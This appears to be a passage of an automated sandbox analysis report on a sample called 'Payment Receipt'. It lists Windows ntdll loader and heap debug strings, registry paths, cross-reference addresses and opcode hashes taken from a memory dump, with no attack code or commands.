                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01618170
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01618181, 016181F5
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                      APIs
                                                                        • Part of subcall function 015E2DF0: LdrInitializeThunk.NTDLL ref: 015E2DFA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BA3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BB6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D74
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                      • String ID:
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      Strings
                                                                      • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01607D03
                                                                      • SsHd, xrefs: 015BA885
                                                                      • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01607D39
                                                                      • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01607D56
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                      Strings
                                                                      • @, xrefs: 015D8591
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015D8421
                                                                      • LdrpInitializeProcess, xrefs: 015D8422
                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015D855E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016055AE
                                                                      • HEAP[%wZ]: , xrefs: 016054D1, 01605592
                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016054ED
                                                                      • HEAP: , xrefs: 016054E0, 016055A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                      Strings
                                                                      • SXS: %s() passed the empty activation context, xrefs: 016121DE
                                                                      • .Local, xrefs: 015D28D8
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016122B6
                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016121D9, 016122B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                      Strings
                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01613437
                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0161342A
                                                                      • RtlDeactivateActivationContext, xrefs: 01613425, 01613432, 01613451
                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01613456
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                      Strings
                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01600FE5
                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0160106B
                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01601028
                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016010AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0160A9A2
                                                                      • LdrpDynamicShimModule, xrefs: 0160A998
                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0160A992
                                                                      • apphelp.dll, xrefs: 015C2462
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • HEAP[%wZ]: , xrefs: 015B3255
                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015B327D
                                                                      • HEAP: , xrefs: 015B3264
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                      Strings
                                                                      • HEAP[%wZ]: , xrefs: 015A1712
                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 015A1728
                                                                      • HEAP: , xrefs: 015A1596
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $@
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0160A121
                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0160A10F
                                                                      • LdrpCheckModule, xrefs: 0160A117
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 016182E8
                                                                      • Failed to reallocate the system dirs string !, xrefs: 016182D7
                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 016182DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0165C1C5
                                                                      • PreferredUILanguages, xrefs: 0165C212
                                                                      • @, xrefs: 0165C1F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                      • API String ID: 0-1373925480
                                                                      Strings
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01624899
                                                                      • LdrpCheckRedirection, xrefs: 0162488F
                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01624888
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 0-3154609507
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-2558761708
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01622104
                                                                      • Process initialization failed with status 0x%08lx, xrefs: 016220F3
                                                                      • LdrpInitializationFailure, xrefs: 016220FA
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2986994758
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: #%u
                                                                      • API String ID: 48624451-232158463
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@
                                                                      • API String ID: 0-149943524
                                                                      Strings
                                                                      • LdrResSearchResource Enter, xrefs: 015AAA13
                                                                      • LdrResSearchResource Exit, xrefs: 015AAA25
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                      • API String ID: 0-4066393604
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      Strings
                                                                      • Failed to retrieve service checksum., xrefs: 015FEE56
                                                                      • ResIdCount less than 2., xrefs: 015FEEC9
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                      • API String ID: 0-863616075
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$MUI
                                                                      • API String ID: 0-17815947
                                                                      Strings
                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015A063D
                                                                      • kLsE, xrefs: 015A0540
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                      • API String ID: 0-2547482624
                                                                      Strings
                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 015AA309
                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 015AA2FB
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                      • API String ID: 0-2876891731
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Cleanup Group$Threadpool!
                                                                      • API String ID: 2994545307-4008356553
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MUI
                                                                      • API String ID: 0-1339004836
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P`vRbv
                                                                      • API String ID: 0-2392986850
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: __aullrem
                                                                      • String ID:
                                                                      • API String ID: 3758378126-0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GlobalTags
                                                                      • API String ID: 0-1106856819
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .mui
                                                                      • API String ID: 0-1199573805
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EXT-
                                                                      • API String ID: 0-1948896318
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RyrJ(
                                                                      • API String ID: 0-4203755499
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      Strings
                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0162895E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                      • API String ID: 0-702105204
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d18e29f8991470abe70c450de4ce20f284909c5cfa15c32c2378e08d37700a
                                                                      • Instruction ID: 15fb1095e96a2536d1e449f5ebd56970c9baa91d8a56ccb2ae5d2c217fa6f6a4
                                                                      • Opcode Fuzzy Hash: a3d18e29f8991470abe70c450de4ce20f284909c5cfa15c32c2378e08d37700a
                                                                      • Instruction Fuzzy Hash: 5A2293759002069FDF15DFA8CC807AEB7B5FF84310F28856AE9159B389D734EA85CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c861d17b771aee8f68d804febcbd3bce9271007513c0328a518f74b10e5020d
                                                                      • Instruction ID: 3bd4af9c5d40d1911e44b45b4135715a46f48cfde4cf00d3a8b9e5a413091b22
                                                                      • Opcode Fuzzy Hash: 9c861d17b771aee8f68d804febcbd3bce9271007513c0328a518f74b10e5020d
                                                                      • Instruction Fuzzy Hash: E5225D70E0011A9FCB1ACFD9C8809BEFBF2BF84704B15815AE955AB241E774ED41CBA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                                      • Instruction ID: 2ce6ea69956b1a30838ff2d2f6bb4e642a501a0713cf19ed04e62c7c0b7d1d75
                                                                      • Opcode Fuzzy Hash: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                                      • Instruction Fuzzy Hash: C732A271A01215CFDB29CF68C880BAEBBF1FF48310F588569E956AB791D774E841CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0bb7c7bf84bfdf0c8ceb6fe03dae389bec0eb3335a25775e3373ac9f5f27d7fe
                                                                      • Instruction ID: 45539d47b891b56ddd3dc623f9a9e6c5199565838c2766170f416759284ae525
                                                                      • Opcode Fuzzy Hash: 0bb7c7bf84bfdf0c8ceb6fe03dae389bec0eb3335a25775e3373ac9f5f27d7fe
                                                                      • Instruction Fuzzy Hash: 8502E3746046528BD724CF2ECC60375BBF9AF85340B19859EE9D6CB382D338D856DB60
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                      • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                      • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                      • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 825707025e4d0acc7fd7654c29e2f52645f336926160f9ecc697b60e62d0ab6d
                                                                      • Instruction ID: f0482745f30cb9114f75d252aee83aefd532c675908c8f137ece83fab6793f0a
                                                                      • Opcode Fuzzy Hash: 825707025e4d0acc7fd7654c29e2f52645f336926160f9ecc697b60e62d0ab6d
                                                                      • Instruction Fuzzy Hash: 7A02A071E01219CFCF05CF98C8806ADBBBAFF98304F298169D556AB755EB30AD42CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3fb374330f28efc112fafd6aecd66fcde51d41ca1492c31159e9d5d6b2105b0
                                                                      • Instruction ID: cafefe18c4acac50dabf6eae0a9f78c657d2835c85a7dba9a6349a402bfd1f16
                                                                      • Opcode Fuzzy Hash: d3fb374330f28efc112fafd6aecd66fcde51d41ca1492c31159e9d5d6b2105b0
                                                                      • Instruction Fuzzy Hash: 5FF1F472E002158FDB18CFADCD9067EBBF6AF98210719816DD866DB385E734EA41CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14613a697ef271e2551b99e8fd3d07c8be57bb0847298adda15c788e99fc281c
                                                                      • Instruction ID: e63e852d68cc416a9233c5d352e5d7fc33cef260a658ed1054fe9acaa56f2d1b
                                                                      • Opcode Fuzzy Hash: 14613a697ef271e2551b99e8fd3d07c8be57bb0847298adda15c788e99fc281c
                                                                      • Instruction Fuzzy Hash: 49F1A273E005269BCB19DEA8C9A05BDFBF5AF54210B1D4269D856EB380D734EE41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                      • Instruction ID: 04aa80ec245e5a48b419f1b47d053e5279a78fe218fb192885a4aa5e6c9825cf
                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                      • Instruction Fuzzy Hash: 1DF15C74E0020A9FDB19DFD9C990AAEBBF5BF48B14F05852DE905AB350E774E841CB60
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 114cfc1287848e5e3528cdf9321aba96d42f91c7c91b638d2af518ddfe9f099b
                                                                      • Instruction ID: a00f8013e2392ba78f41663d72953c59bff9a627e8d1d38d1f30617d222e80f8
                                                                      • Opcode Fuzzy Hash: 114cfc1287848e5e3528cdf9321aba96d42f91c7c91b638d2af518ddfe9f099b
                                                                      • Instruction Fuzzy Hash: DBE1E131A042869BDB64CFACDC506BEBBF1BF44750F08841EE896AB381D775A985CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                                      • Instruction ID: 59baa22e5fe114c5858c3fe91a6f52b879415ef4c62400008b22d7159702b47d
